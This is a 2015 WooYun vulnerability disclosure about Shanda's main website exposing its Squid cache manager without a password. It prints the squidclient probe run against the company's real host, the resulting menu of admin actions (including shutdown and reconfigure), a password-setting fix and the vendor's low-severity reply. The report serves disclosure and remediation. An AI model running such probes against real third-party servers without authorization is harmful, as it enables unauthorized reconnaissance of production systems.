当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112920

漏洞标题:盛大主站某服务配置不当信息泄露

相关厂商:盛大网络

漏洞作者: depycode

提交时间:2015-05-08 19:07

修复时间:2015-06-25 09:52

公开时间:2015-06-25 09:52

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

RT..

详细说明:

漏洞证明:

c:\>squidclient.exe -h www.snda.com -p 80 mgr:
HTTP/1.1 200 OK
Server: squid
Date: Fri, 08 May 2015 09:13:56 GMT
Content-Type: text/plain
Expires: Fri, 08 May 2015 09:13:56 GMT
X-Cache: MISS from GD-FS-T-238.5
Transfer-Encoding: chunked
Via: 1.0 GD-FS-T-238.5:85 (squid)
Connection: close
900
 mem                    Memory Utilization      public
 cbdata                 Callback Data Registry Contents public
 events                 Event Queue     public
 squidaio_counts        Async IO Function Counters      public
 config                 Current Squid Configuration     hidden
 ipcache                IP Cache Stats and Contents     public
 fqdncache              FQDN Cache Stats and Contents   public
 idns                   Internal DNS Statistics public
 external_acl           External ACL stats      public
 http_headers           HTTP Header Statistics  public
 menu                   This Cachemanager Menu  public
 shutdown               Shut Down the Squid Process     hidden
 reconfigure            Reconfigure the Squid Process   hidden
 offline_toggle         Toggle offline_mode setting     hidden
 info                   General Runtime Information     public
 filedescriptors        Process Filedescriptor Allocation       public
 objects                All Cache Objects       public
 vm_objects             In-Memory and In-Transit Objects        public
 openfd_objects         Objects with Swapout files open public
 pending_objects        Objects being retreived from the network        public
 client_objects         Objects being sent to clients   public
 io                     Server-side network read() size histograms      public
 counters               Traffic and Resource Counters   public
 peer_select            Peer Selection Algorithms       public
 digest_stats           Cache Digest and ICP blob       public
 5min                   5 Minute Average of Counters    public
 60min                  60 Minute Average of Counters   public
 utilization            Cache Utilization       public
 histograms             Full Histogram Counts   public
 active_requests        Client-side Active Requests     public
 xiaosi                 mem     public
 storedir               Store Directory Stats   public
 store_check_cachable_stats     storeCheckCachable() Stats      public
 store_io               Store IO Interface Stats        public
 pconn                  Persistent Connection Utilization Histograms    public
 refresh                Refresh Algorithm Statistics    public
 forward                Request Forwarding Statistics   public
 client_list            Cache Client List       public
 asndb                  AS Number Database      public
 server_list            Peer Cache Statistics   public
0

修复方案:

cachemgr_passwd password_here all

版权声明:转载请注明来源 depycode@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-05-11 09:50

厂商回复:

谢谢报告,没有实际危害!

最新状态:

暂无